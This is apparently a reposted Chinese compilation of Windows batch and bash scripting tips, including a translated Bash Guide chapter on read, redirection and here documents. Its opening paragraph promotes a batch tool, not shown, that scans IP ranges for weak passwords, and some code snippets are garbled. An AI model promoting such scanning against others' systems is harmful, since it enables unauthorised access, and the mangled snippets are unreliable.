当然上面这个例子可能有些朋友会说太简单并且太死板不灵活。我把这个例子做了些修改(完整文件见光盘ipc.bat)由兴趣的朋友可以自己看看。修改后的程序可以灵活的查找你指定开始到结束或你指定开始到最大ip的范围。当然功能还可以在加强,至于能加强到什么地步能不能成为一个新的工具那就是你的事了。

这个的循环动作大了点主要是ip的数字替换麻烦所以没办法。这个批处理我就不写注释了,大家好好的参考上面的内容你会很快看懂这个批处理的。看懂了得不要说简单哦!最起码这是个没有使用任何第三方工具就能探测并保存弱口令的批处理了!!简单的改一改杀伤力还是很大的。以上这些批处理全部在win2000和xp下测试通过最大的优点就是只有一个批处理文件并且绝对不会误报。缺点就是太长!


Tips:
 通过屏蔽echo off 可以通过output查看具体的命令细节(包括了嵌套调用的bat内容和展开的宏的内容)
::@echo off

可以在bat中通过 copy %0  PATH/ 的方式将bat文件另存为(用于生成临时bat最后删除的情况)


如何换行?
在CMD下,可以用^作为换行符,类似于Linux下的\ 

如何设本地变量和使用?
用setlocal。举例如下:
@echo off
setlocal
set command_name=start pemu.exe
set nic1=-net nic,vlan=1,macaddr=00:aa:00:00:01:01 -net tap,vlan=1,ifname=tap1 
set nic2=-net nic,vlan=2,macaddr=00:aa:00:00:01:02 -net tap,vlan=2,ifname=tap2 
set nic3=-net nic,vlan=3,macaddr=00:aa:00:00:01:03 -net tap,vlan=3,ifname=tap3 
set options=-serial [url=telnet::1007,server] telnet::1007,server [/url] 
set parameter= -m 128 FLASH802
%command_name% %nic1% %nic2% %nic3% %options% %parameter% 

如何在新的窗口中运行命令?
start可以打开一个新的窗口,但是打开新窗口后还是在原窗口运行,想要在新窗口中运行命令 就在原窗口运行bat,
如果匹配条件就start新窗口

 
如果交互式运行bat?
set /p

eg:
  1. 跳出窗口输入时间定时关机
  2. ECHO off
  3. SET times=
  4. SET /P times="请输入时间:[默认 22:00]"
  5. IF "%times%"=="" (
  6. SET times="22:00"
  7. )
  8. at %times% shutdown

@echo off
:start
set cmd
set /p cmd=   // 获得变量输入
if %cmd%==xx goto restart xxApplicationgoto start // 变量输入值判断,选择执行分支。。。

:restart xxApplication

net stop xxApplication

net start xxApplication

goto start

使用这个脚本之后,运行一些要很多输入的命令,要方便很多。

两个杀进程的好方法:

ntsd 和taskkill , taskkill居然还支持以程序名的形式来杀,真不错还支持通配符的。

运行效果:
taskkill /F /IM per*

成功: 已终止进程 "perl.exe",其 PID 为 2968。
成功: 已终止进程 "perl.exe",其 PID 为 2972。

ntsd -c q -p pid   (-c 是command的意思, q是退出的意思,还有更多的选项?)


shell脚本中如何关闭回显?

如果需要在shell脚本执行的过程中查看其当前正在执行的命令,可以使用:

set -v on

默认情况下是不回显命令的,也可以使用

set -v off



显式的关闭命令回显


PS:  经测试 需要把set -v off放在shell脚本的最后 一行 前面执行的就不会显示,加两行或者加到开头无用

不知为何?


shell脚本下如何实现pause的功能?

windows批处理程序中的pause命令可以实现“按任意键继续”的效果,要在shell中实现这一功能,可以借助read。

09103142_t1yC.gif
注意: 
注意不是所有的shell提供的read都支持本文介绍的方法。目前本文已确定适用于
bash

你可能还没注意到read的强大功能,其实只要用下面的代码,就可以实现简单的"pause"。

read -n 1 -p "Press any key to continue..."

但它有明显的不足:

如果用户输入的不是回车,虽然能"continue",但没有输出换行,导致输出格式混乱。(直接在命令提示符下运行更为突出)。 用户输入的字符会显示在屏幕上,影响美观。 如果进行了输入重定向,哪怕有:
read
line read -p somevar …

这样的代码,都会导致错误。

关于重定向引发的错误,如果需要,可以用文件描述符代替重定向解决。目前没有想到更好的解决方案。主要针对前两个不足做了改进。

read
-n "Press any key to continue..." INP $INP != '' echo -ne '\b \n'

说明:

记录了输入的字符(存到$INP),以便处理。 注意如果输入的是回车,read一个字符也读到,而不是读到\n。 当输入不是换行时,用退格盖掉原来的空格。

为了方便使用,可以写成:

#! /bin/bash
read -n "$*" INP $INP != '' echo -ne '\b \n' #使用时: pause 'Press any key to continue...'

仍存有的问题:

  • 对空格和Tab支持不好。
  • 重定向的问题没有解决。


 

8.2. 捕捉用户输入

8.2.1. 使用内建命令read

内建命令 read 是 echo 和 printf 命令互补的命令。read 命令的语法如下:

read [options] NAME1 NAME2 ... NAMEN

从标准输入或者使用 -u 选项的参数提供的文件描述符读取一行。行的第一个词被赋予第一个名字,NAME1,第二个词被赋予第二个名字,以此类推, with leftover words and their intervening separators assigned to the last name, NAMEN. 如果从输入读取的字符比名字要少,那么接下来的名字将被赋予空值。If there are fewer words read from the input stream than there are names, the remaining names are assigned empty values.

在 IFS 变量中的字符用来把输入行分割成字或者段;参见 第 3.4.8 节 “字分割”。反斜杠字符可以用来去除读入的下一个字符的特殊含义为了行的延续。

如果没有提供名字,读入的行就赋给变量 REPLY。

read 命令的返回代码是零,除非遇到一个文件结束(应该是EOF)字符,(要么)如果 read 超时或者一个非法的文件描述符提供给 -u 选项作为参数。

以下选项是Bash read 内建命令支持的:

表 8.2. read 内建命令的选项

选项 含义
-a ANAME The words are assigned to sequential indexes of the array variable ANAME, starting at 0. All elements are removed from ANAME before the assignment. OtherNAME arguments are ignored.
-d DELIM The first character of DELIM is used to terminate the input line, rather than newline.
-e readline is used to obtain the line.
-n NCHARS read returns after reading NCHARS characters rather than waiting for a complete line of input.
-p PROMPT Display PROMPT, without a trailing newline, before attempting to read any input. The prompt is displayed only if input is coming from a terminal.
-r If this option is given, backslash does not act as an escape character. The backslash is considered to be part of the line. In particular, a backslash-newline pair may not be used as a line continuation.
-s Silent mode. If input is coming from a terminal, characters are not echoed.
-t TIMEOUT Cause read to time out and return failure if a complete line of input is not read within TIMEOUT seconds. This option has no effect if read is not reading input from the terminal or from a pipe.
-u FD Read input from file descriptor FD.

这里有一个很直接的例子,改进了先前章节中的 leaptest.sh 脚本:

  1. michel ~/test>catleaptest.sh #!/bin/bash
  2. # This script will test if you have given a leap year or not.
  3. echo "Type the year that you want to check (4 digits), followed by [ENTER]:"
  4. read year
  5. if (( ("$year" % 400) == "0" )) || (( ("$year" % 4 == "0") && ("$year" % 100 !=
  6. "0") )); then
  7. echo "$year is a leap year."
  8. else
  9. echo "This is not a leap year."
  10. fimichel ~/test>leaptest.sh Type the year that you want to check (4 digits), followed by [ENTER]:
  11. 2000
  12. 2000 is a leap year.

8.2.2. 提示用户输入

以下的例子向你展示了使用提示来向用户解释应该输入什么。

  1. michel ~/test>catfriends.sh #!/bin/bash
  2. # This is a program that keeps your address book up to date.
  3. friends="/var/tmp/michel/friends"
  4. echo "Hello, "$USER". This script will register you in Michel's friends database."
  5. echo -n "Enter your name and press [ENTER]: "
  6. read name
  7. echo -n "Enter your gender and press [ENTER]: "
  8. read -n 1 gender
  9. echo
  10. grep -i "$name" "$friends"
  11. if [ $? == 0 ]; then
  12. echo "You are already registered, quitting."
  13. exit 1
  14. elif [ "$gender" == "m" ]; then
  15. echo "You are added to Michel's friends list."
  16. exit 1
  17. else
  18. echo -n "How old are you? "
  19. read age
  20. if [ $age -lt 25 ]; then
  21. echo -n "Which colour of hair do you have? "
  22. read colour
  23. echo "$name $age $colour" >> "$friends"
  24. echo "You are added to Michel's friends list. Thank you so much!"
  25. else
  26. echo "You are added to Michel's friends list."
  27. exit 1
  28. fi
  29. fimichel ~/test>cpfriends.sh /var/tmp; cd/var/tmp michel ~/test>touchfriends; chmoda+wfriends michel ~/test>friends.sh Hello, michel. This script will register you in Michel's friends database.
  30. Enter your name and press [ENTER]: michel
  31. Enter your gender and press [ENTER] :m
  32. You are added to Michel's friends list.michel ~/test>catfriends

注意这里没有省略输出。这个脚本仅仅储存Michel感兴趣的信息,但是除非你已经在里面了,否则将一直提示你已经被加入了列表。

其他人现在可以执行这个脚本:

  1. [anny@octarine tmp]$friends.sh Hello, anny. This script will register you in Michel's friends database.
  2. Enter your name and press [ENTER]: anny
  3. Enter your gender and press [ENTER] :f
  4. How old are you? 22
  5. Which colour of hair do you have? black
  6. You are added to Michel's friends list.

一会之后, friends 列表开始开上去像这样:

  1. tille 24 black
  2. anny 22 black
  3. katya 22 blonde
  4. maria 21 black
  5. --output omitted--

当然,这个情况并不是理想的,因为每个人都能编辑(但不是删除)Michel的文件。你可以再这个脚本文件里使用特别的存取模式来解决问题,参见Linux手册的介绍中的 SUID and SGID 再Linux手册的介绍中见SUID和SGID。

8.2.3. 重定向和文件描述符

8.2.3.1. 概要

就像你知道的在shell的基本用法中,一个命令的输入和输出可以在执行完毕前被重定向,使用一个特殊的符号-重定向操作符-由shell来解释。重定向也可以用来为当前shell执行环境打开和关闭文件。

重定向也可以出现在一个脚本中,所以它可以从一个文件收到输入,比如,或者发送输出到一个文件。然后,用户可以回顾这个输出文件,或者可以被另外一个脚本当作输入。

文件输入输出由追踪为一个给定的进程所有打开文件的整数句柄来完成。这些数字值就是文件描述符。最为人们所知的文件米描述符是 stdinstdout 和 stderr,文件描述符的数字分别是0,1和2。这些数字和各自的设备是保留的。Bash可以也可以把网络主机的TCP或者UDP端口也认为是一个文件描述符。

下面的输出展示怎么保留文件描述符指向真实的设备:

  1. michel ~>ls-l/dev/std* lrwxrwxrwx 1 root root 17 Oct 2 07:46 /dev/stderr -> ../proc/self/fd/2
  2. lrwxrwxrwx 1 root root 17 Oct 2 07:46 /dev/stdin -> ../proc/self/fd/0
  3. lrwxrwxrwx 1 root root 17 Oct 2 07:46 /dev/stdout -> ../proc/self/fd/1michel ~>ls-l/proc/self/fd/[0-2] lrwx------ 1 michel michel 64 Jan 23 12:11 /proc/self/fd/0 -> /dev/pts/6
  4. lrwx------ 1 michel michel 64 Jan 23 12:11 /proc/self/fd/1 -> /dev/pts/6
  5. lrwx------ 1 michel michel 64 Jan 23 12:11 /proc/self/fd/2 -> /dev/pts/6

你可能想检查 info MAKEDEV 和 info proc 来得到更多关于 /proc 子目录和你的系统为每个运行的进程操纵文件描述符的方法的信息。

当你以命令行来运行一个脚本的时候,没有什么太多的改变,因为子shell进程会使用和父进程相同的文件描述符。当没有这个的父进程存在的话,比如你使用cron 工具来运行一个脚本,标准的文件描述符是管道或者其他(临时)文件,除非使用一些形式重定向。在下面的例子中证明,展示了从例子脚本 at 的输出:

  1. michel ~>date Fri Jan 24 11:05:50 CET 2003michel ~>at 1107 warning: commands will be executed using (in order)
  2. a) $SHELL b) login shell c)/bin/shat>ls-l/proc/self/fd/>/var/tmp/fdtest.at at><EOT> job 10 at 2003-01-24 11:07michel ~>cat/var/tmp/fdtest.at total 0
  3. lr-x------ 1 michel michel 64 Jan 24 11:07 0 -> /var/spool/at/!0000c010959eb (deleted)
  4. l-wx------ 1 michel michel 64 Jan 24 11:07 1 -> /var/tmp/fdtest.at
  5. l-wx------ 1 michel michel 64 Jan 24 11:07 2 -> /var/spool/at/spool/a0000c010959eb
  6. lr-x------ 1 michel michel 64 Jan 24 11:07 3 -> /proc/21949/fd

还有一个使用 cron的:

  1. michel ~>crontab-l # DO NOT EDIT THIS FILE - edit the master and reinstall.
  2. # (/tmp/crontab.21968 installed on Fri Jan 24 11:30:41 2003)
  3. # (Cron version -- $Id: chap8.xml,v 1.8 2005/09/05 12:39:22 tille Exp $)
  4. 32 11 * * * ls -l /proc/self/fd/ > /var/tmp/fdtest.cronmichel ~>cat/var/tmp/fdtest.cron total 0
  5. lr-x------ 1 michel michel 64 Jan 24 11:32 0 -> pipe:[124440]
  6. l-wx------ 1 michel michel 64 Jan 24 11:32 1 -> /var/tmp/fdtest.cron
  7. l-wx------ 1 michel michel 64 Jan 24 11:32 2 -> pipe:[124441]
  8. lr-x------ 1 michel michel 64 Jan 24 11:32 3 -> /proc/21974/fd
8.2.3.2. 错误重定向

从先前的例子中,很清楚你可以为一个脚本提供输入和输出文件(更多参阅 第 8.2.4 节 “文件输入和输出”),但是一些忘记错误重定向的企图-一些之后可以仰赖的输出。同时,如果你幸运的话,错误会mail给你,可能的错误原因会被被揭示出来。但是不幸的话,错误会导致你的脚本失败而且也不会被捕捉或者发送到任何地方,以至于你载调试的同时什么都做不了。

当重定向错误的时候,注意优先的顺序是有意义的。比如,这个命令,发生在 /var/spool

ls-l*2 >/var/tmp/unaccessible-in-spool

将重定向 ls 命令的输出到在 /var/tmp 中的文件 unaccessible-in-spool, 这个命令

ls-l*>/var/tmp/spoollist2 >& 1

将把标准输出和标准错误都定向到文件 spoollist。这个命令

ls-l*2 >& 1 >/var/tmp/spoollist

仅仅把标准输出定向到目标文件里,因为在标准输出重定向之前标准错误已经拷贝到标准输出。

为了方便,如果确定它们将不使用,错误常常重定向到 /dev/null。可以在你的系统的起始脚本里找到很多例子。

Bash允许你使用如下的结构来重定向标准输出和标准错误到名字是 FILE 扩展的结果的文件:

&> FILE

This is the equivalent of > FILE 2>&1, the construct used in the previous set of examples. It is also often combined with redirection to /dev/null, for instance when you just want a command to execute, no matter what output or errors it gives.

8.2.4. 文件输入和输出

8.2.4.1. 使用 /dev/fd

/dev/fd 目录包含了名为 0, 1, 2等的入口。打开文件 /dev/fd/N 等价于复制文件描述符 N。如果你的系统提供 /dev/stdin, /dev/stdout 和 /dev/stderr,你会看到它们分别等于 /dev/fd/0, /dev/fd/1 和 /dev/fd/2。

/dev/fd 的主要使用价值来自于shell。这种机制允许程序以和其他路径名相同的方式使用路径名参数来操纵标准输入和标准输出。如果 /dev/fd 在系统中不存在,你将不得不找一个办法来迂回解决这个问题。比如可以使用(-)来表明程序需要从管道读取就可以达到目的。一个例子: This mechanism allows for programs that use pathname arguments to handle standard input and standard output in the same way as other pathnames.

  1. michel ~>filterbody.txt.gz| catheader.txt-footer.txt This text is printed at the beginning of each print job and thanks the sysadmin
  2. for setting us up such a great printing infrastructure.
  3. Text to be filtered.
  4. This text is printed at the end of each print job.

cat 命令首先读取文件 header.txt,然后他的标准输入是 filter 命令的输出,最后 footer.txt 。折线的特殊含义作为命令行参数涉及标准输入或者标准输出是一种误解,尽管已经在许多程序中被这么认为。当指定折线作为第一个参数的时候也可能产生问题,也许他会被解释成一个先前命令的选项。使用 /dev/fd来允许一致性和防止混淆:

michel ~>filterbody.txt| catheader.txt /dev/fd/0 footer.txt| lp

在这个清晰的例子中,所有的输出被附加管道通过 lp 送往默认的打印机。

8.2.4.2. 读取和exec
8.2.4.2.1. 分配给文件以文件描述符

另外一种着眼文件描述符的方法是把他们认为是分配给文件一个数值。你可以使用文件描述符值,而不是使用文件名。内建命令 exec 是用来给文件分配一个文件描述符。使用

exec fdN> file

分配文件描述符N给 file 进行输出:

exec fdN< file

分配文件描述符N给 file 进行输入。在文件描述符分配给一个文件后,可以和shell的重定向操作符一起使用,在下面的例子中加以证明:

  1. michel ~>exec4>result.txt michel ~>filterbody.txt| catheader.txt /dev/fd/0 footer.txt>&4 michel ~>catresult.txt This text is printed at the beginning of each print job and thanks the sysadmin
  2. for setting us up such a great printing infrastructure.
  3. Text to be filtered.
  4. This text is printed at the end of each print job.
[注意] 文件描述符5

使用这个文件描述符可能导致问题,参见A the Advanced Bash-Scripting Guide第16章。强烈建议不要使用它。

8.2.4.2.2. 在脚本中读取

以下是一个例子向你展示怎么样在文件输入和命令行输入中进行转换:

  1. michel ~/testdir>catsysnotes.sh #!/bin/bash
  2. # This script makes an index of important config files, puts them together in
  3. # a backup file and allows for adding comment for each file.
  4. CONFIG=/var/tmp/sysconfig.out
  5. rm "$CONFIG" 2>/dev/null
  6. echo "Output will be saved in $CONFIG."
  7. exec 7<&0
  8. exec < /etc/passwd
  9. # Read the first line of /etc/passwd
  10. read rootpasswd
  11. echo "Saving root account info..."
  12. echo "Your root account info:" >> "$CONFIG"
  13. echo $rootpasswd >> "$CONFIG"
  14. exec 0<&7 7<&-
  15. echo -n "Enter comment or [ENTER] for no comment: "
  16. read comment; echo $comment >> "$CONFIG"
  17. echo "Saving hosts information..."
  18. # first prepare a hosts file not containing any comments
  19. TEMP="/var/tmp/hosts.tmp"
  20. cat /etc/hosts | grep -v "^#" > "$TEMP"
  21. exec 7<&0
  22. exec < "$TEMP"
  23. read ip1 name1 alias1
  24. read ip2 name2 alias2
  25. echo "Your local host configuration:" >> "$CONFIG"
  26. echo "$ip1 $name1 $alias1" >> "$CONFIG"
  27. echo "$ip2 $name2 $alias2" >> "$CONFIG"
  28. exec 0<&7 7<&-
  29. echo -n "Enter comment or [ENTER] for no comment: "
  30. read comment; echo $comment >> "$CONFIG"
  31. rm "$TEMP"michel ~/testdir>sysnotes.sh Output will be saved in /var/tmp/sysconfig.out.
  32. Saving root account info...
  33. Enter comment or [ENTER] for no comment: hint for password: blue lagoon
  34. Saving hosts information...
  35. Enter comment or [ENTER] for no comment: in central DNSmichel ~/testdir>cat/var/tmp/sysconfig.out Your root account info:
  36. root:x:0:0:root:/root:/bin/bash
  37. hint for password: blue lagoon
  38. Your local host configuration:
  39. 127.0.0.1 localhost.localdomain localhost
  40. 192.168.42.1 tintagel.kingarthur.com tintagel
  41. in central DNS
8.2.4.3. 关闭文件描述符

既然子进程继承打开文件描述符,那么在不需要文件描述符的时候关闭它将是一个良好的习惯,使用以下语句完成:

exec fd<&-

上面的例子分配给标准输入的文件描述符7,在每次用户需要读取真实便准输入设备-通常是键盘的时候就关闭。syntax.

以下是一个简单的例子只有在向管道提交一个标准错误时的重定向:

  1. michel ~>catlistdirs.sh #!/bin/bash
  2. # This script prints standard output unchanged, while standard error is
  3. # redirected for processing by awk.
  4. INPUTDIR="$1"
  5. exec 6>&1
  6. ls "$INPUTDIR"/* 2>&1 >&6 6>&- \
  7. # Closes fd 6 for awk, but not for ls.
  8. | awk 'BEGIN { FS=":" } { print "YOU HAVE NO ACCESS TO" $2 }' 6>&-
  9. exec 6>&-
8.2.4.4. Here 文档

经常性的,你的脚本可能调用其他程序或者脚本来请求输入。 here 文档提供了一种通知shell从当前源读取输入直到找到行仅仅包含搜索字符的方法。(no trailing blanks). 所有读取的行到那个点然后作为一个命令的标准输入。

结果是你不需要访问单独的文件;你可以使用shell特殊字符,看上去比 echo 的更好看些:

  1. michel ~>catstartsurf.sh #!/bin/bash
  2. # This script provides an easy way for users to choose between browsers.
  3. echo "These are the web browsers on this system:"
  4. # Start here document
  5. cat << BROWSERS
  6. mozilla
  7. links
  8. lynx
  9. konqueror
  10. opera
  11. netscape
  12. BROWSERS
  13. # End here document
  14. echo -n "Which is your favorite? "
  15. read browser
  16. echo "Starting $browser, please wait..."
  17. $browser &michel ~>startsurf.sh These are the web browsers on this system:
  18. mozilla
  19. links
  20. lynx
  21. konqueror
  22. opera
  23. netscapeWhich is your favorite?opera Starting opera, please wait...

尽管我们讨论 here document, it is supposed to be a construct within the same script. This is an example that installs a package automatically, eventhough you should normally confirm:

  1. #!/bin/bash
  2. # This script installs packages automatically, using yum.
  3. if [ $# -lt 1 ]; then
  4. echo "Usage: $0 package."
  5. exit 1
  6. fi
  7. yum install $1 << CONFIRM
  8. y
  9. CONFIRM

这是脚本是如何运行的。当看到这样的 “Is this ok [y/N]” 提示字符串,这个脚本会自动回答 “y”:

  1. [root@picon bin]#./install.sh tuxracer Gathering header information file(s) from server(s)
  2. Server: Fedora Linux 2 - i386 - core
  3. Server: Fedora Linux 2 - i386 - freshrpms
  4. Server: JPackage 1.5 for Fedora Core 2
  5. Server: JPackage 1.5, generic
  6. Server: Fedora Linux 2 - i386 - updates
  7. Finding updated packages
  8. Downloading needed headers
  9. Resolving dependencies
  10. Dependencies resolved
  11. I will do the following:
  12. [install: tuxracer 0.61-26.i386]Is this ok [y/N]:EnterDownloading Packages
  13. Running test transaction:
  14. Test transaction complete, Success!
  15. tuxracer 100 % done 1/1
  16. Installed: tuxracer 0.61-26.i386 

Transaction(s) Complete
......

set指令:显示或设置shell特性及shell变量

【语    法】set [+-abCdefhHklmnpPtuvx]

【功能介绍】该指令作用主要是显示系统中已经存在的shell变量,以及设置shell变量的新变量值。

【参数说明】

    

    

-a

标识已经修改的变量,以便输出为系统环境变量

-b

立即报告后台程序的运行状态

-C

禁止使用符合“<”、“<>”、“>&

重写文件

-d

shell默认会记录使用过的指令,以

便加速其执行。但是,若不需要使用,

则可以使用该参数选项将此功能取消

续表

    

    

-e

如果指令返回值不为0,则立即退出shell

-f

取消使用通配符

-h

自动记录函数所在位置

-H shell

可以利用符号“!+ <指令编号>

的格式来执行历史中已经记录的指令

-k

指令所给的参数都会被视作该指令的环境变量

-m

使用监视模式

-n

只是读取指令,而不真正执行

-p

启动优先顺序模式

-P

执行指令时,将以实际的文件或者

目录来取代符号连接

-t

执行完随后的指令,则立即退出shell

-u

当执行该指令时,遇到未经定义过

的变量,则显示错误信息

-v

显示shell所读取的输入值

-x

使用该参数选项,会先显示该指令

以及其下的参数

+<参数选项>

取消某个set指令曾启动的参数

【经验技巧】

使用该指令更改shell特性时,符号"+"和"-"的作用分别是打开和关闭指定的模式。

该指令不能够定义新的shell变量。如果要定义新的变量,可以使用指令"declare"以"变量名=值"的格式进行定义即可。



转载于:https://my.oschina.net/alphajay/blog/56897

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/76605
推荐阅读
相关标签
  

闽ICP备14008679号